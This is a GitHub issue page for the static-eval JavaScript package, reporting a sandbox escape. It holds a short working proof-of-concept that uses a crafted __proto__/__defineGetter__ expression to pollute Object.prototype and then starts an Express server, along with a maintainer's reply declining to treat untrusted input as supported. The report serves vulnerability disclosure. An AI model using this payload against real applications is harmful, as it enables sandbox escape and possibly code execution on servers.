static-eval icon indicating copy to clipboard operation
static-eval copied to clipboard

Published 20 hours ago verified publisher icon browserify

Sandbox Escape

Open po6ix opened this issue 5 years ago • 1 comments

poc

// make pollution
const evaluate = require('static-eval');
const parse = require('esprima').parse;

var src = `({})['__proto__']['__defineGetter__']('toString', ({})['constructor'])`
var ast = parse(src).body[0].expression;

evaluate(ast);

// serve webapp
const express = require('express');
const app = express();

app.get('/', (req, res) => {
    res.end('working!');
});

app.listen(8080);

details in https://blog.p6.is/bypassing-a-js-sandbox/#Prototype-Pollution-to-Remote-Code-Execution

po6ix avatar Jul 29 '20 04:07 po6ix

Thanks for the report! As the readme says we don't encourage people to use static-eval on untrusted input because of things like this, there are probably many more undiscovered ways too :sweat_smile:

I'll see if there is a simple fix for this, anyway, but it's not the highest priority.

goto-bus-stop avatar Aug 14 '20 06:08 goto-bus-stop